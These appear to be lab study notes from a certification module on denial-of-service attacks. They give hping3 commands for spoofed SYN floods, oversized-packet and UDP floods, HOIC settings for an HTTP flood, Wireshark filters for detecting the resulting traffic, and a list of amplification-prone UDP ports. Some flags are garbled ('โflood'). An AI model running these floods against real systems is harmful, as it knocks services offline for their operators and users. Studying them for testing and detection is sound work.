10 - DoS
Module 10 - Denial-of-Service
SYN Flooding
Perform a SYN Flooding on a Target Host using hping3
Target:
Wireshark->Ethernet
Attacker
hping3 -S <Target IP> -a <Spoofable IP> -p <Port to flood> -flood
-S: Set the SYN flag
-a: Spoof the IP address
-p: Specify the destination port, e.g 22
--flood: Send a huge number of packets
Target
Check Wireshark
Attacker (Perform PoD)
hping3 -d 65538 -S -p 21 โflood <Target IP>
-d: Specify data size
-S: Set the SYN flag
Attacker (Perform UDP application layer flood attack)
nmap -p 139 10.10.10.19 (check service)
hping3 -2 -p 139 โflood <Target IP>
-2: Specify UDP mode
SYN Flooding using Metasploit
HTTP Flooding Attack
HTTP Flooding Attack using HOIC (High Orbit Ion Cannon)
Open HOIC.
Set threads = 20
Click + to add target
Enter Target http://<Target IP> -> Power = High -> Booster = GenericBoost.hoic
Click FIRE TEH LAZER! to launch attack
Detecting DoS Attack traffic
KFSensor Free Trial: http://www.keyfocus.net/kfsensor/ Wireshark: https://www.wireshark.org/
To find DOS (SYN and ACK) :
tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0
To find passwords :
http.request.method == POST
To find DOS -> Look for Red and Black packets with around 1-2 simple packets in between and then pick any packet and check the Source and Destination IP with port if need.
To determine the number of machines that were involved in DDOS attack
statistic -> IPv4 statistic -> source and destination address
Or
View Flood attack on victim via Wireshark | use filter tcp.port=21
Or
Find the dos attacker ip using Wireshark
Statistic -> conversion
identified ip , which has flooding server with SYN request.
Or
get the statistics of ipv4 -> we can see that Packets B -> A are null, because the're not reply pack.
Other UDP-based applications and their ports
CharGen UDP Port 19
SNMPv2 UDP Port 161
QOTD UDP Port 17
RPC UDP Port 135
SSDP UDP Port 1900
CLDAP UDP Port 389
TFTP UDP Port 69
NetBIOS UDP Port 137,138,139
NTP UDP Port 123
Quake Network Protocol UDP Port 26000
VoIP UDP Port 5060
Last updated